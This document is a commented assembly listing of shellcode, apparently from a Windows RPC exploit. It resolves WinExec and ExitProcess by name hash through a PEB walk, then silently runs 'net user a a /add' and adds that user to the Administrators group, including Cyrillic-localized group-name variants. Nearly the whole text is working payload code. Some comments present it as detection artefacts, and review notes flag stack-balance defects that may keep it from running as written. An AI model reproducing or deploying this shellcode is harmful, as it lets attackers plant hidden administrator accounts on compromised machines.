Universal shellcode for Windows RPC2 Universal Exploit

    
; Segment type:  Pure code
                              ;seg000         segment byte public 'CODE' use32
                              ;               assume cs:seg000
                              ;               assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
                              ; MASM/IDA-style listing, 32-bit Intel syntax, stdcall helpers.
                              ; Disassembler-generated header: the var_* equates below are frame
                              ; names inherited from the original disassembly; nothing in this
                              ; listing references them.
                              .386
                              assume cs:seg000
                              var_29C         = byte ptr -29Ch
                              var_28C         = byte ptr -28Ch
                              var_25F         = byte ptr -25Fh
                              var_254         = dword ptr -254h
                              var_250         = dword ptr -250h
                              var_24C         = dword ptr -24Ch

                              seg000          segment byte public 'CODE' use32   ; single code segment; no data section, all strings are built on the stack

                              beginofpackeddata:                      ; CODE XREF: UnXORFunc+17j
                              ; Payload entry. The XREF says control arrives from a decoder stub
                              ; ("UnXORFunc") that is not part of this listing, i.e. this block is
                              ; the decoded form.
                              ; Behaviour visible here (useful as detection artefacts):
                              ;   1. resolve WinExec and ExitProcess from kernel32 by name hash
                              ;   2. WinExec four "net ..." command lines (user creation + group add)
                              ;   3. ExitProcess(0)
                              ; Register roles: esi -> scratch table on the stack:
                              ;   [esi]     = kernel32 image base
                              ;   [esi+0Ch] = WinExec
                              ;   [esi+10h] = ExitProcess
                              push    ebp
                              mov     ebp, esp
                              sub     esp, 80h                        ; 128-byte scratch area
                              mov     esi, esp                        ; esi -> scratch table
                              call    sub_191                         ; eax = kernel32 base (PEB walk, see sub_191)
                              ; NOTE(review): sub_191 ends in "retn 4" although no argument was
                              ; pushed, so esp now sits 4 bytes above esi; the stack is not kept
                              ; balanced anywhere in this block.
                              push eax                                ; keep the base across the PEB write
                              mov     eax, fs:18h                     ; TEB self pointer
                              mov     eax, [eax+30h]                  ; TEB+30h = PEB
                              lea     eax, [eax+18h]                  ; PEB+18h (ProcessHeap field)
                              mov     ebx, 190000h
                              mov     [eax], ebx                      ; overwrite PEB field with fixed 190000h — presumably repairing process state after the overflow; not verifiable from this listing
                              pop  eax
                              mov     [esi], eax                      ; [esi] = kernel32 base
                              push    dword ptr [esi]                 ; arg_4: module base
                              push    0E8AFE98h                       ; arg_0: ror-13/add hash of "WinExec"
                              call    GetFunctionBYName ;WinExec
                              mov     [esi+0Ch], eax                  ; [esi+0Ch] = WinExec
                              push    dword ptr [esi]                 ; arg_4: module base
                              push    73e2d87eh                       ; arg_0: hash of "ExitProcess"
                              call    GetFunctionBYName ;ExitProcess
                              mov     [esi+10h], eax                  ; [esi+10h] = ExitProcess

                              ; Each block below builds a NUL-terminated command line on the stack
                              ; (pushes are little-endian, so every 4-char literal appears reversed
                              ; and the string is pushed last-dword-first), then calls
                              ; WinExec(lpCmdLine = esp, uCmdShow = 0).
                              xor     eax, eax
                              push    eax                             ; terminator
                              push    'd'
                              push    'da/ '
                              push    'a a '
                              push    'resu'
                              push    ' ten'                          ; -> "net user a a /add"
                              mov     ecx, esp                        ; ecx = lpCmdLine
                              push    eax                             ; uCmdShow = 0 (hidden)
                              push    ecx
                              call    dword ptr [esi+0Ch]             ; WinExec

                              xor     eax, eax
                              push    eax
                              push    'd'
                              push    'da/ '
                              push    'a û'
                              push    'ðîòà'
                              push    'ðòñè'
                              push    'íèìä'
                              push    'À pu'
                              push    'orgl'
                              push    'acol'
                              push    ' ten'                          ; -> "net localgroup <group> a /add"; the high bytes appear to be a Cyrillic "Administrators" group name in the ANSI (cp1251) code page, shown here as mojibake — localized-Windows variant
                              mov     ecx, esp
                              push    eax
                              push    ecx
                              call    dword ptr [esi+0Ch]             ; WinExec

                              xor     eax, eax
                              push    eax
                              push    'd'
                              push    'da/ '
                              push    'a ë'
                              push    'à®â'
                              push    'àâá¨'
                              push    '­¨¬¤'
                              push    ' pu'
                              push    'orgl'
                              push    'acol'
                              push    ' ten'                          ; -> same command, group name in what looks like the OEM (cp866) encoding
                              mov     ecx, esp
                              push    eax
                              push    ecx
                              call    dword ptr [esi+0Ch]             ; WinExec

                              xor     eax, eax
                              push    eax
                              push    'd'
                              push    'da/ '
                              push    'a s'
                              push    'rota'
                              push    'rtsi'
                              push    'nimd'
                              push    'A pu'
                              push    'orgl'
                              push    'acol'
                              push    ' ten'                          ; -> "net localgroup Administrators a /add"
                              mov     ecx, esp
                              push    eax
                              push    ecx
                              call    dword ptr [esi+0Ch]             ; WinExec

                              push    0h                              ; uExitCode = 0
                              call    dword ptr [esi+10h] ;           ; ExitProcess — never returns
                              ;               end

                              ;  S U B R O U T I N E 


                              GetFunctionBYNameproc near             ; CODE XREF: UnXORFunc+31p
                                        ; UnXORFunc+40p ...
                              ; Resolve an exported function by a 32-bit hash of its name.
                              ;   [esp+arg_0] (14h) = target hash
                              ;   [esp+arg_4] (18h) = image base of the module to search
                              ;   arg offsets = 4 saved registers (10h) + return address (4)
                              ; Out: eax = function address, or 0 if no export name matches
                              ;      edx = module base (left in edx on both paths)
                              ; Preserves ebx, ebp, esi, edi; clobbers ecx, edx, flags, DF=0.
                              ; Hash: h = 0; for each name byte c: h = ror(h, 13) + c
                              ; NOTE(review): "retn 4" releases only one of the two dwords the
                              ; callers on this page push.

                              arg_0           = dword ptr  14h
                              arg_4           = dword ptr  18h

                              push    ebx
                              push    ebp
                              push    esi
                              push    edi
                              mov     ebp, [esp+arg_4]                ; ebp = module base
                              mov     eax, [ebp+3Ch]                  ; e_lfanew
                              mov     edx, [ebp+eax+78h]              ; RVA of export directory (DataDirectory[0])
                              add     edx, ebp                        ; edx -> IMAGE_EXPORT_DIRECTORY
                              mov     ecx, [edx+18h]                  ; NumberOfNames
                              mov     ebx, [edx+20h]                  ; AddressOfNames (RVA)
                              add     ebx, ebp                        ; ebx -> name RVA table

                              loc_1B2:                                ; CODE XREF: GetFunctionBYName+36j
                              ; Scan names from the last one downwards; ecx = names left to try.
                              jecxz   short loc_1E6                   ; exhausted -> return 0
                              dec     ecx
                              mov     esi, [ebx+ecx*4]                ; esi = RVA of name[ecx]
                              add     esi, ebp                        ; esi -> name string
                              xor     edi, edi                        ; edi = running hash
                              cld

                              loc_1BD:                                ; CODE XREF: GetFunctionBYName+30j
                              xor     eax, eax                        ; ah = 0 is the terminator compared below
                              lodsb
                              cmp     al, ah                          ; end of name?
                              jz      short loc_1CB
                              ror     edi, 0Dh
                              add     edi, eax
                              jmp     short loc_1BD
                              ; 

                              loc_1CB:                                ; CODE XREF: GetFunctionBYName+29j
                              cmp     edi, [esp+arg_0]                ; hash match?
                              jnz     short loc_1B2
                              mov     ebx, [edx+24h]                  ; AddressOfNameOrdinals
                              add     ebx, ebp
                              mov     cx, [ebx+ecx*2]                 ; cx = ordinal for name[ecx]; upper half of ecx is assumed to be already zero
                              mov     ebx, [edx+1Ch]                  ; AddressOfFunctions
                              add     ebx, ebp
                              mov     eax, [ebx+ecx*4]                ; RVA of the function
                              add     eax, ebp                        ; -> absolute address
                              jmp     short loc_1E8
                              ; 

                              loc_1E6:                                ; CODE XREF: GetFunctionBYName+19j
                              xor     eax, eax                        ; not found

                              loc_1E8:                                ; CODE XREF: GetFunctionBYName+4Bj
                              mov     edx, ebp                        ; edx = module base for the caller
                              pop     edi
                              pop     esi
                              pop     ebp
                              pop     ebx
                              retn    4
                              GetFunctionBYName endp

                              sub_191         proc near               ; CODE XREF: sub_76+Bp
                              ; Locate the kernel32.dll image base without any import.
                              ; Out: eax = ebp-value computed below (the base); esi, ebp restored.
                              ; Ends with "retn 4" although the caller on this page pushes no
                              ; argument (see the note at the call site).
                              push    ebp
                              push    esi
                              mov     eax, fs:30h                     ; PEB pointer on NT-family Windows
                              test    eax, eax
                              js      short loc_1A9                   ; kernel-range pointer -> treated as the Win9x layout
                              mov     eax, [eax+0Ch]                  ; PEB->Ldr
                              mov     esi, [eax+1Ch]                  ; Ldr->InInitializationOrderModuleList.Flink (first entry)
                              lodsd                                   ; eax = first entry's Flink = second entry
                              mov     ebp, [eax+8]                    ; DllBase (links at +10h, DllBase at +18h); assumes the second initialised module is kernel32, true for the XP-era targets this was written for
                              jmp     short loc_1B2
                              ; 

                              loc_1A9:                                ; CODE XREF: sub_191+Aj
                              ; Win9x-style path; the offsets used here cannot be verified from
                              ; this listing.
                              mov     eax, [eax+34h]
                              mov     ebp, [eax+0B8h]

                              loc_1B2:                                ; CODE XREF: sub_191+16j
                              mov     eax, ebp                        ; return the base in eax
                              pop     esi
                              pop     ebp
                              retn    4
                              sub_191 endp
                              ; 

                              seg000          ends

                              end                                     ; no entry label: control comes from the external decoder stub referenced at beginofpackeddata
                              
                              
